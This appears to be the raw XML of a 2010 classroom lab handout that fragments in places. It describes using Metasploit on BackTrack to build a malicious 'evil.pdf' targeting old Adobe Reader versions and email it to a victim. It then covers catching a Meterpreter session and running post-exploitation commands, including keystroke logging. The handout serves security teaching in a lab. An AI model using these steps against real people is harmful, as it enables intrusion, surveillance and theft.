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258889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Warning: Be careful!  Don't attack anyone without permiss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50.7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i/>
                          <w:sz w:val="26"/>
                        </w:rPr>
                        <w:t>Warning: Be careful!  Don't attack anyone without permiss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BackTrack 4 as the attacker.   This could be a real or virtual machine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You can get BackTrack here: http://www.backtrack-linux.org/downloads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The BackTrack ISO file is also available in the S214 lab, on the VMs partitio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Windows to be the target.  It can be a real or virtual machine.  I used a Win 7 machine, but this exploit has been reported to work on XP and Vista also/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The target machine must be using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Adobe Reader 9.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or earlier (to get old versions of adobe, go to http://www.oldapps.com/adobe_reader.php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wo computers must be able to connect to one another over a network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Connecting BackTrack to the Intern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BackTrack 4 doesn't start networking by default.  In a Terminal window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etc/init.d/networking start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="60"/>
        <w:ind w:left="1080" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This starts wired networking.  If you need wireless networking, you must also issue this command: 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etc/init.d/NetworkManager star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o make sure you are connected to the Interne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ng google.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="60"/>
        <w:ind w:left="1080" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">When you see replies, press Ctrl+C to stop the pings. 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etc/init.d/NetworkManager start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Find Your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 and then press the Enter key, as shown below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config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65405</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4725035" cy="75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ragraph">
                  <wp:posOffset>145415</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2385695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51.1pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:11.4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IPv4 address that connects to the Internet.  Write it in the box to the right on this page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ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Update Metas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9040</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-213360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3978275" cy="2689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BackTrack 4 machine, at a command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conso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etasploit launches, as shown to the right on this page. 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upda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it for the update to complete.  Then exit from msfconsole and re-start it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Creating the Evil PDF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at a command prompt, type these commands, pressing the Enter key after each one, as shown below on this page..  In the third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windows/fileformat/adobe_cooltype_sing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OUTPUTPATH /root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set FILENAME evil.pdf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PAYLOAD windows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203200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5939790" cy="23063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Delivering the Malicious PD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ackTrack 4 machine, click the Firefox icon.  Email the PDF to your victim machine.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Listen for the Target's Connec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at a command prompt, type these commands, pressing the Enter key after each one, as shown below on this page..  In the second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multi/handler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PAYLOAD windows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ExitOnSession false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 -j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280</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>46990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5942965" cy="21005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504825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1092200" cy="495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hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Executing the Malicious PD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target computer, open the PDF file in Adobe Reade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ackTrack 4 machine, you should see a "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Meterpreter session 1 opened</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" message, as shown above on this page.  Enter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ssions -i 1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now own the target!  Here are some fun meterpreter commands to tr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hell</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Gives you a Windows Command Prompt o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creenshot</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Gives you an image of the target's deskto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start</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Begins capturing keys typed i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dump</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Shows the keystrokes captured so far</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Saving the Screen Imag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Meterpreter session 1 opened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KSnap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se a "Capture mode" of "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Full Screen</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".  Click the "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>New Snapshot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Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">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screenshot in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/root </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">folder, which is your desktop.  Name it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Yourname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-ProjX10.jpg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0"/>
        <w:ind w:left="360" w:hanging="576"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Email the JPEG image to me as an attachment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9 From </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Your Name</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  Send a Cc to yourself.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Last modified 10-14-10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10: PDF Exploit with Metasploit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27:00Z</dcterms:created>
  <dc:creator>Sam</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>sam</cp:lastModifiedBy>
  <cp:lastPrinted>2010-09-15T13:58:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-10-14T16:39:00Z</dcterms:modified>
  <cp:revision>6</cp:revision>
  <dc:subject/>
  <dc:title>Stealing Passwords With Wireshark</dc:title>
</cp:coreProperties>
</file>